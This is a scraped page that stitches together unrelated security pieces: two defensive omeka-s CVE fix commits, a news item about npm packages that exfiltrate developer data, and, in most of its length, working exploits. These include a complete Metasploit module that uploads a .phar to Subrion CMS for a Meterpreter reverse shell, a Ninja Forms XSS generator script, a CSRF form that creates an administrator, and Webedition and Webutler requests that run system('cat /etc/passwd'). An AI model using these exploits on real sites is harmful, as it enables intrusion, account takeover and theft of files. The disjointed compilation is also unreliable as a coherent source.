Improper Input Validation in GitHub repository omeka/omeka-s prior to 4.0.3.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

*   Notifications
*   Fork 109

*   Code
*   Issues 53
*   Pull requests 63
*   Actions
*   Projects
*   Wiki
*   Security
*   Insights

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

Escape installation title when displaying

(cherry picked from commit ca84d69)

*   Loading branch information

Showing **3 changed files** with **3 additions** and **3 deletions**.

*   *   *   layout-admin.phtml
    *   *   *   browse.phtml
        *   *   index.phtml

2 changes: 1 addition & 1 deletion application/view/layout/layout-admin.phtml

Expand Up

@@ -37,7 +37,7 @@ $this->trigger('view.layout');

<a href\="#content" class\="skip"\><?php echo $translate('Skip to main content'); ?></a\>

<div class\="flex"\>

<header\>

<div class\="logo"\><a href\="<?php echo $this\->url('admin'); ?>"\><?php echo $this\->setting('installation\_title', 'Omeka S'); ?></a\></div\>

<div class\="logo"\><a href\="<?php echo $this\->url('admin'); ?>"\><?php echo $escape($this\->setting('installation\_title', 'Omeka S')); ?></a\></div\>

<div id\="mobile-nav"\>

<a href\="#" class\="o-icon-menu button"\><span class\="screen-reader-text"\><?php echo $translate('Navigation menu'); ?></span\></a\>

<a href\="#" class\="o-icon-search button"\><span class\="screen-reader-text"\><?php echo $translate('Search site'); ?></span\></a\>

Expand Down

2 changes: 1 addition & 1 deletion application/view/omeka/admin/index/browse.phtml

Expand Up

@@ -6,7 +6,7 @@ echo $this->pageTitle($translate('Admin dashboard'));

  

<div id\="dashboard"\>

<?php echo $this\->partial('common/version-notification'); ?>

<p\><?php echo sprintf($translate('Welcome to the %s admin dashboard!'), $title); ?></p\>

<p\><?php echo sprintf($translate('Welcome to the %s admin dashboard!'), $this\->escapeHtml($title)); ?></p\>

<?php $this\->trigger('view.browse.before'); ?>

<div id\="manage-resources" class\="panel"\>

<h2\><?php echo $translate('Manage resources'); ?></h2\>

Expand Down

2 changes: 1 addition & 1 deletion application/view/omeka/index/index.phtml

Expand Up

@@ -31,5 +31,5 @@ endforeach;

<p\><?php echo sprintf(

$translate('Go to the %1$s to start working with %2$s.'),

$this\->hyperlink($translate('Admin dashboard'), $this\->url('admin')),

$title

$this\->escapeHtml($title)

); ?></p\>

**0 comments on commit 8b72619**

Please sign in to comment.

CVE-2023-4157: Escape installation title when displaying · omeka/omeka-s@8b72619

Unrestricted Upload of File with Dangerous Type in GitHub repository omeka/omeka-s prior to 4.0.3.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

*   Notifications
*   Fork 109

*   Code
*   Issues 53
*   Pull requests 63
*   Actions
*   Projects
*   Wiki
*   Security
*   Insights

**Commit**

Permalink

Browse files

Browse the repository at this point in the history

Validate asset extensions as well as types

Adds a parallel configurable list of allowed asset extensions alongside
the list of allowed types.

(cherry picked from commit 66e1294)

*   Loading branch information

Showing **2 changed files** with **8 additions** and **1 deletion**.

*   *   *   module.config.php
    *   *   AssetAdapter.php

7 changes: 7 additions & 0 deletions application/config/module.config.php

Expand Up

@@ -47,6 +47,13 @@

'image/gif',

'image/webp',

\],

'allowed\_extensions' => \[

'jpeg',

'jpg',

'png',

'gif',

'webp',

\],

\],

'permissions' => \[

'acl\_resources' => \[

Expand Down

2 changes: 1 addition & 1 deletion application/src/Api/Adapter/AssetAdapter.php

Expand Up

@@ -70,7 +70,7 @@ public function hydrate(Request $request, EntityInterface $entity, ErrorStore $e

  

$tempFile\->setSourceName($fileData\['file'\]\['name'\]);

$config = $this\->getServiceLocator()->get('Config');

$validator = new Validator($config\['api\_assets'\]\['allowed\_media\_types'\]);

$validator = new Validator($config\['api\_assets'\]\['allowed\_media\_types'\], $config\['api\_assets'\]\['allowed\_extensions'\]);

if (!$validator\->validate($tempFile, $errorStore)) {

return;

}

Expand Down

**0 comments on commit 2a7fb26**

Please sign in to comment.

CVE-2023-4159: Validate asset extensions as well as types · omeka/omeka-s@2a7fb26

This Metasploit module exploits an authenticated file upload vulnerability in Subrion CMS versions 4.2.1 and lower. The vulnerability is caused by the .htaccess file not preventing the execution of .pht, .phar, and .xhtml files. Files with these extensions are not included in the .htaccess blacklist, hence these files can be uploaded and executed to achieve remote code execution. In this module, a .phar file with a randomized name is uploaded and executed to receive a Meterpreter session on the target, then deletes itself afterwards.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::PhpEXE  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Intelliants Subrion CMS 4.2.1 - Authenticated File Upload Bypass to RCE',        'Description' => %q{          This module exploits an authenticated file upload vulnerability in          Subrion CMS versions 4.2.1 and lower. The vulnerability is caused by          the .htaccess file not preventing the execution of .pht, .phar, and          .xhtml files. Files with these extensions are not included in the          .htaccess blacklist, hence these files can be uploaded and executed          to achieve remote code execution. In this module, a .phar file with          a randomized name is uploaded and executed to receive a Meterpreter          session on the target, then deletes itself afterwards.        },        'License' => MSF_LICENSE,        'Author' => [          'Hexife',             # Original discovery, PoC, and CVE submission          'Fellipe Oliveira',   # ExploitDB author          'Ismail E. Dawoodjee' # Metasploit module author        ],        'References' => [          [ 'EDB', '49876' ],          [ 'CVE', '2018-19422' ],          [ 'URL', 'https://github.com/intelliants/subrion/issues/801' ],          [ 'URL', 'https://github.com/intelliants/subrion/issues/840' ],          [ 'URL', 'https://github.com/advisories/GHSA-73xj-v6gc-g5p5' ]        ],        'Platform' => 'php',        'Arch' => ARCH_PHP,        'Targets' => [          [            'PHP',            {              'Platform' => 'php',              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ]        ],        'Privileged' => false,        'DisclosureDate' => '2018-11-04',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(80, true, 'Subrion CMS default port'),        OptString.new('TARGETURI', [ true, 'Base path', '/' ]),        OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin' ]),        OptString.new('PASSWORD', [ true, 'Password to authenticate with', 'admin' ])      ]    )  end  def check    uri = normalize_uri(target_uri.path, 'panel/') # requires a trailing forward slash    print_status("Checking target web server for a response at: #{full_uri(uri)}")    res = send_request_cgi({      'method' => 'GET',      'uri' => uri    })    unless res      return CheckCode::Unknown('Target did not respond to check request.')    end    unless res.code == 200 && res.body.downcase.include?('subrion')      return CheckCode::Unknown('Target is not running Subrion CMS.')    end    print_good('Target is running Subrion CMS.')    # Powered by <a href="https://subrion.org/" title="Subrion CMS">Subrion CMS v4.2.1</a><br>    print_status('Checking Subrion CMS version...')    version_number = res.body.to_s.scan(/Subrion\sCMS\sv([\d.]+)/).flatten.first    unless version_number      return CheckCode::Detected('Subrion CMS version cannot be determined.')    end    print_good("Target is running Subrion CMS Version #{version_number}.")    if Rex::Version.new(version_number) <= Rex::Version.new('4.2.1')      return CheckCode::Appears(        'However, this version check does not guarantee that the target is vulnerable, ' \        'since a fix for the vulnerability can easily be applied by a web admin.'      )    end    return CheckCode::Safe  end  def login_and_get_csrf_token(username, password)    print_status('Connecting to Subrion Admin Panel login page to obtain CSRF token...')    # Session cookies need to be kept to preserve the CSRF token across multiple requests    uri = normalize_uri(target_uri.path, 'panel/')    res = send_request_cgi({      'method' => 'GET',      'uri' => uri,      'keep_cookies' => true    })    unless res && res.code == 200      fail_with(Failure::Unknown, "#{peer} - Could not access the Subrion Admin Panel page.")    end    # <input type="hidden" name="__st" value="CA0S3w50vz1zRpdgZl98JAMVrimiXI63lKtxAwyi">    %r{name="__st" value="(?<csrf_token>[\w+=/]+)">} =~ res.body    fail_with(Failure::NotFound, "#{peer} - Failed to get CSRF token.") if csrf_token.nil?    print_good("Successfully obtained CSRF token: #{csrf_token}")    print_status(      "Logging in to Subrion Admin Panel at: #{full_uri(uri)} " \      "using credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}"    )    auth = send_request_cgi({      'method' => 'POST',      'uri' => uri,      'keep_cookies' => true,      'vars_post' => {        '__st' => csrf_token,        'username' => username,        'password' => password      }    })    unless auth && auth.code == 200      fail_with(Failure::NoAccess, "#{peer} - Failed to log in, cannot access the Admin Panel page.")    end    %r{name="__st" value="(?<csrf_token_auth>[\w+=/]+)">} =~ auth.body    unless csrf_token == csrf_token_auth && auth.body.downcase.include?('administrator')      fail_with(Failure::NoAccess, "#{peer} - Failed to log in, invalid credentials.")    end    print_good('Successfully logged in as Administrator.')    return csrf_token  end  def upload_and_execute_payload(csrf_token)    print_status('Preparing payload...')    # set `unlink_self: true` to delete the file after execution    payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.phar"    php_payload = get_write_exec_payload(unlink_self: true)    data = Rex::MIME::Message.new    data.add_part(Rex::Text.rand_text_alphanumeric(14), nil, nil, 'form-data; name="reqid"')    data.add_part('upload', nil, nil, 'form-data; name="cmd"')    data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')    data.add_part(csrf_token, nil, nil, 'form-data; name="__st"')    data.add_part(      "#{php_payload}\n",      'application/octet-stream',      nil,      "form-data; name=\"upload[]\"; filename=\"#{payload_name}\""    )    data.add_part(Time.now.getutc.to_i.to_s, nil, nil, 'form-data; name="mtime[]"')    print_status('Sending POST data...')    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'panel', 'uploads', 'read.json'),      'keep_cookies' => true,      'ctype' => "multipart/form-data; boundary=#{data.bound}",      'data' => data.to_s    })    unless res && res.code == 200      fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload PHP payload.")    end    payload_uri = normalize_uri(target_uri.path, 'uploads', payload_name)    print_good("Successfully uploaded payload at: #{full_uri(payload_uri)}")    # This execution request returns nil    print_status("Executing '#{payload_name}'... This file will be deleted after execution.")    send_request_cgi({      'method' => 'GET',      'uri' => payload_uri,      'keep_cookies' => true    })    print_good("Successfully executed payload: #{full_uri(payload_uri)}")  end  def exploit    csrf_token = login_and_get_csrf_token(datastore['USERNAME'], datastore['PASSWORD'])    upload_and_execute_payload(csrf_token)  endend

Intelliants Subrion CMS 4.2.1 Remote Code Execution

WordPress EventON Calendar plugin version 4.4 suffers from an insecure direct object reference vulnerability.

    # Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access# Date: 03.08.2023# Exploit Author: Miguel Santareno# Vendor Homepage: https://www.myeventon.com/# Version: 4.4# Tested on: Google and Firefox latest version# CVE : CVE-2023-2796# 1. DescriptionThe plugin lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.# 2. Proof of Concept (PoC)Proof of Concept:https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=value

WordPress EventON Calendar 4.4 Insecure Direct Object Reference

WordPress Ninja Forms plugin version 3.6.25 suffers from a cross site scripting vulnerability.

# Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated)# Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt# Date: 2023-07-27# Exploit Author: Mehran Seifalinia# Vendor Homepage: https://ninjaforms.com/# Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip# Version: 3.6.25# Tested on: Windows 10# CVE: CVE-2023-37979from requests import getfrom sys import argvfrom os import getcwdimport webbrowserfrom time import sleep# Values:url = argv[-1]if url[-1] == "/":    url = url.rstrip("/")# ConstantsCVE_NAME = "CVE-2023-37979"VULNERABLE_VERSION = "3.6.25"  # HTML templateHTML_TEMPLATE = f"""<!DOCTYPE html><html><head>  <title>{CVE_NAME}</title>  <style>    body {{      font-family: Arial, sans-serif;      background-color: #f7f7f7;      color: #333;      margin: 0;      padding: 0;    }}    header {{      background-color: #4CAF50;      padding: 10px;      text-align: center;      color: white;      font-size: 24px;    }}    .cool-button {{      background-color: #007bff;      color: white;      padding: 10px 20px;      border: none;      cursor: pointer;      font-size: 16px;      border-radius: 4px;    }}    .cool-button:hover {{      background-color: #0056b3;    }}  </style></head><body>  <header>  Ninja-forms reflected XSS ({CVE_NAME})</br>    Created by Mehran Seifalinia  </header>  <div style="padding: 20px;">    <form action="{url}/wp-admin/admin-ajax.php" method="POST">      <input type="hidden" name="action" value="nf_batch_process" />      <input type="hidden" name="batch_type" value="import_form_template" />      <input type="hidden" name="security" value="e29f2d8dca" />      <input type="hidden" name="extraData[template]" value="formtemplate-contactformd" />      <input type="hidden" name="method_override" value="_respond" />      <input type="hidden" name="data" value="Mehran"}}<img src=Seifalinia onerror=alert(String.fromCharCode(78,105,110,106,97,45,102,111,114,109,115,32,114,101,102,108,101,99,116,101,100,32,88,83,83,10,67,86,69,45,50,48,50,51,45,51,55,57,55,57,10,45,77,101,104,114,97,110,32,83,101,105,102,97,108,105,110,105,97,45))>" />      <input type="submit" class="cool-button" value="Click here to Execute XSS" />    </form>  </div>  <div style="background-color:red;color:white;padding:1%;">After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.</div>  <footer>  <a href="https://github.com/Mehran-Seifalinia">Github</a>  </br>  <a href="https://www.linkedin.com/in/mehran-seifalinia-63577a1b6/?originalSubdomain=ir">LinkedIn</a  </footer></body></html>"""def exploit():    with open(f"{CVE_NAME}.html", "w") as poc:        poc.write(HTML_TEMPLATE)        print(f"[@] POC Generated at {getcwd()}\{CVE_NAME}.html")        print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")        sleep(2)        webbrowser.open(f"{getcwd()}\{CVE_NAME}.html")# Check if the vulnerable version is installeddef check_CVE():    try:        response = get(url + "/wp-content/plugins/ninja-forms/readme.txt")        if response.status_code != 200 or not("Ninja Forms" in response.text):            print("[!] Ninja-forms plugin has not installed on this site.")            return False        else:            version = response.text.split("Stable tag:")[1].split("License")[0].split()[0]            main_version = int(version.split(".")[0])            partial_version = int(version.split(".")[1])            final_version = int(version.split(".")[2])            if (main_version < 3) or (main_version == 3 and partial_version < 6) or (main_version == 3 and partial_version == 6 and final_version <= 25):                print(f"[*] Vulnerable Nonja-forms version {version} detected!")                return True            else:                print(f"[!] Nonja-forms version {version} is not vulnerable!")                return False    except Exception as error:        print(f"[!] Error: {error}")        exit()# Check syntax of the scriptdef check_script():    usage = f"""Usage: {argv[0].split("/")[-1].split("/")[-1]} [OPTIONS] [TARGET]    OPTIONS:        --exploit:  Open a browser and execute the vulnerability.    TARGET:        An URL starts with 'http://' or 'https://'Examples:    > {argv[0].split("/")[-1]} https://vulnsite.com    > {argv[0].split("/")[-1]} --exploit https://vulnsite.com"""    try:        if len(argv) < 2 or len(argv) > 3:            print("[!] Syntax error...")            print(usage)            exit()        elif not url.startswith(tuple(["http://", "https://"])):            print("[!] Invalid target...\n\tTarget most starts with 'http://' or 'https://'")            exit()        else:            for arg in argv:                if arg == argv[0]:                    print("[*]Starting the script >>>")                    state = check_CVE()                    if state == False:                        exit()                elif arg.lower() == "--exploit":                    exploit()                elif arg == url:                    continue                else:                    print(f"[!] What the heck is '{arg}' in the command?")    except Exception as error:        print(f"[!] Error: {error}")        exit()if __name__ == "__main__":    check_script()

WordPress Ninja Forms 3.6.25 Cross Site Scripting

COURIER DEPRIXA version 2.5 suffers from a cross site request forgery vulnerability.

====================================================================================================================================| # Title     : COURIER DEPRIXA V2.5 CSRF Vulnerability                                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://www.themeslide.com/courier-deprixa-logistics-worldwide-v2-5/                                               |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 5.[+] Set the target site link Save changes and apply . [+] infected file : /deprixa/settings/addusersadmin/agregar.php[+] save code as poc.html [+]  <h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i> New Administrator</h4>                          </div>                          <div class="modal-body">                                                      <form action="https://127.0.0.1/galaxyexpressuaecom/deprixa/settings/addusersadmin/agregar.php"  class="form-horizontal" method="post">                              <div class="form-group " id="gnombrepa">                              <label for="off_name" class="col-sm-2 control-label">Name</label>                              <div class="col-sm-10">                                <input type="text" class="form-control off_name" name="name_parson"  placeholder="Name Administrator ">                              </div>                              </div>                              <div class="form-group" id="gapellido">                              <label for="email" class="col-sm-2 control-label">Email </label>                              <div class="col-sm-5">                                <input type="text" class="form-control email" name="email"   placeholder="Email ">                              </div>                              <div class="col-sm-5">                                <input class="form-control phone" name="phone" placeholder="Phone">                                                                    </div>                              </div>                              <div class="form-group" id="gemail">                              <label for="office" class="col-sm-2 control-label">Office</label>                              <div class="col-sm-5">                                <input type="text" class="form-control office" name="office"  placeholder="Office ">                              </div>                              <div class="col-sm-5">                              <select type="text" class="form-control role" name="role" >                                <option value="Administrator">Administrator</option>                                                    </select>                              </div>                              </div>                              <div class="form-group " id="gnombre">                              <label for="off_name" class="col-sm-2 control-label">User</label>                              <div class="col-sm-10">                                <input type="text" class="form-control off_name" name="name"  placeholder="User">                              </div>                              </div>                              <div class="form-group" id="gpassword">                              <label for="pwd" class="col-sm-2 control-label">Password</label>                              <div class="col-sm-10">                                <input type="text" class="form-control pwd" name="pwd"  placeholder="Password">                              </div>                              </div>                              <div class="form-group">                              <div class="col-sm-offset-2 col-sm-10">                                <div class="checkbox checkbox-success">                                  <input id="checkbox3" type="checkbox" name="estado" value="1" checked>                                  <label for="checkbox3">                                    Status                                  </label>                                </div>                                <div class="checkbox checkbox-inline" >                                  <input type="checkbox"  name="type" value="a" onclick="return false" checked>                                  <label for="inlineCheckbox3"> Type of user </label>                                </div>                              </div>                              </div>                                                          </div>                            <div class="modal-footer">                              <button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i>                                Close</button>                              <input class="btn btn-success" name="Submit" type="submit"  id="submit" value="Save">                            </div>                          </form>                                                      </div>                        </div>                      </div>                      <!--fin de moGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

COURIER DEPRIXA 2.5 Cross Site Request Forgery

Webedition CMS version 2.9.8.8 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: Webedition CMS v2.9.8.8 - Stored XSSApplication: Webedition CMSVersion: v2.9.8.8   Bugs:  Stored XssTechnology: PHPVendor URL: https://www.webedition.org/Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1Date of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1. Login to account2. Go to New ->  Media -> Image3. Upload malicious svg file svg file content:"""<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>"""Poc request:POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1Host: localhostContent-Length: 761Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=73fee01822cc1e1b9ae2d7974583bb8eAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300Connection: closewe_transaction=73fee01822cc1e1b9ae2d7974583bb8e&we_cea6f7e60ce62be78e59f849855d2038_Filename=malas&we_cea6f7e60ce62be78e59f849855d2038_Extension=.svg&wetmp_we_cea6f7e60ce62be78e59f849855d2038_Extension=&we_cea6f7e60ce62be78e59f849855d2038_ParentPath=%2F&we_cea6f7e60ce62be78e59f849855d2038_ParentID=0&yuiAcContentTypeParentPath=&we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&check_we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&we_cea6f7e60ce62be78e59f849855d2038_IsProtected=0&fold%5B0%5D=0&fold_named%5BPropertyPage_2%5D=0&fold%5B1%5D=0&fold_named%5BPropertyPage_3%5D=0&wetmp_cea6f7e60ce62be78e59f849855d2038_CreatorID=%2Fadmin&we_cea6f7e60ce62be78e59f849855d2038_CreatorID=1&we_cea6f7e60ce62be78e59f849855d2038_RestrictOwners=0&we_complete_request=1

Webedition CMS 2.9.8.8 Cross Site Scripting

Webedition CMS version 2.9.8.8 suffers from a remote code execution vulnerability.

    Exploit Title: Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)Application: webedition CmsVersion: v2.9.8.8   Bugs:  RCETechnology: PHPVendor URL: https://www.webedition.org/Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1Date of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1. Login account2. Go to New -> Webedition page -> empty page3. Select php4. Set as "><?php echo system("cat /etc/passwd");?>  Description areaPoc request: POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1Host: localhostContent-Length: 1621Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0ddAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300Connection: closewe_transaction=4fd880c06df5a590754ce5b8738cd0dd&we_003be033b474a5c25132d388906fb4ae_Filename=poc&we_003be033b474a5c25132d388906fb4ae_Extension=.php&wetmp_we_003be033b474a5c25132d388906fb4ae_Extension=&we_003be033b474a5c25132d388906fb4ae_ParentPath=%2F&we_003be033b474a5c25132d388906fb4ae_ParentID=0&yuiAcContentTypeParentPath=&we_003be033b474a5c25132d388906fb4ae_DocType=&we_003be033b474a5c25132d388906fb4ae_TemplateName=%2F&we_003be033b474a5c25132d388906fb4ae_TemplateID=&yuiAcContentTypeTemplate=&we_003be033b474a5c25132d388906fb4ae_IsDynamic=0&we_003be033b474a5c25132d388906fb4ae_IsSearchable=0&we_003be033b474a5c25132d388906fb4ae_InGlossar=0&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E&we_003be033b474a5c25132d388906fb4ae_txt%5BKeywords%5D=asdf&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_003be033b474a5c25132d388906fb4ae_Language=en_GB&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Bde_DE%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Ben_GB%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_003be033b474a5c25132d388906fb4ae_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_003be033b474a5c25132d388906fb4ae_CreatorID=%2Fadmin&we_003be033b474a5c25132d388906fb4ae_CreatorID=1&we_003be033b474a5c25132d388906fb4ae_RestrictOwners=0&we_complete_request=1

Webedition CMS 2.9.8.8 Remote Code Execution

Webutler version 3.2 suffers from a remote shell upload vulnerability.

    Exploit Title: Webutler v3.2 - Remote Code Execution (RCE)Application: webutler CmsVersion: v3.2Bugs:  RCETechnology: PHPVendor URL: https://webutler.de/enSoftware Link: http://webutler.de/download/webutler_v3.2.zipDate of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. login to account as admin2. go to visit media 3.upload phar file4. upload poc.phar filepoc.phar file contents :<?php echo system("cat /etc/passwd");?>5. Visit to poc.phar filepoc request:POST /webutler_v3.2/admin/browser/index.php?upload=newfile&types=file&actualfolder=%2F&filename=poc.phar&overwrite=true HTTP/1.1Host: localhostContent-Length: 40sec-ch-ua: sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36X_FILENAME: poc.pharsec-ch-ua-platform: ""Accept: */*Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/webutler_v3.2/admin/browser/index.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: WEBUTLER=ekgfsfhi3ocqdvv7ukqoropoluConnection: close<?php echo system("cat /etc/passwd");?>

Webutler 3.2 Shell Upload

Cybersecurity researchers have discovered a new bunch of malicious packages on the npm package registry that are designed to exfiltrate sensitive developer information.
Software supply chain firm Phylum, which first identified the "test" packages on July 31, 2023, said they "demonstrated increasing functionality and refinement," hours after which they were removed and re-uploaded under different

Cybersecurity researchers have discovered a new bunch of malicious packages on the npm package registry that are designed to exfiltrate sensitive developer information.

Software supply chain firm Phylum, which first identified the "test" packages on July 31, 2023, said they "demonstrated increasing functionality and refinement," hours after which they were removed and re-uploaded under different, legitimate-sounding package names.

While the end goal of the undertaking is not clear, it's suspected to be a highly targeted campaign aimed at the cryptocurrency sector based on references to modules such as "rocketrefer" and "binarium."

All the packages were published by the npm user malikrukd4732. A common feature across all the modules is the ability to launch JavaScript ("index.js") that's equipped to exfiltrate valuable information to a remote server.

"The index.js code is spawned in a child process by the preinstall.js file," the Phylum researcher team said. "This action is prompted by the postinstall hook defined in the package.json file, which is executed upon package installation."

The first step entails gathering the current operating system username and the current working directory, following which a GET request with the collected data is sent to 185.62.57\[.\]60:8000/http. The exact motivation behind this action is currently unknown, although it's believed that the information could be used to trigger "unseen server-side behaviors."

Subsequently, the script proceeds to look for files and directories matching a specific set of extensions: .env, .svn, .gitlab, .hg, .idea, .yarn, .docker, .vagrant, .github, .asp, .js, .php, .aspx, .jspx, .jhtml, .py, .rb, .pl, .cfm, .cgi, .ssjs, .shtml, .env, .ini, .conf, .properties, .yml, and .cfg.

The harvested data, which could also contain credentials and valuable intellectual property, is ultimately transmitted to the server in the form of a ZIP archive file.

"While these directories can have sensitive information, it's more likely they contain a lot of standard application files which are not unique to the victim's system and hence less valuable to the attacker, whose motive appears to be centered around extraction of source code or environment-specific configuration files," Phylum said.

The development is the latest example of open-source repositories being used to propagate malicious code, what with ReversingLabs identifying a PyPI campaign that employs suspicious python packages such as VMConnect to contact a command-and-control (C2) server and attempt to download an unspecified Base64-encoded string with additional commands.

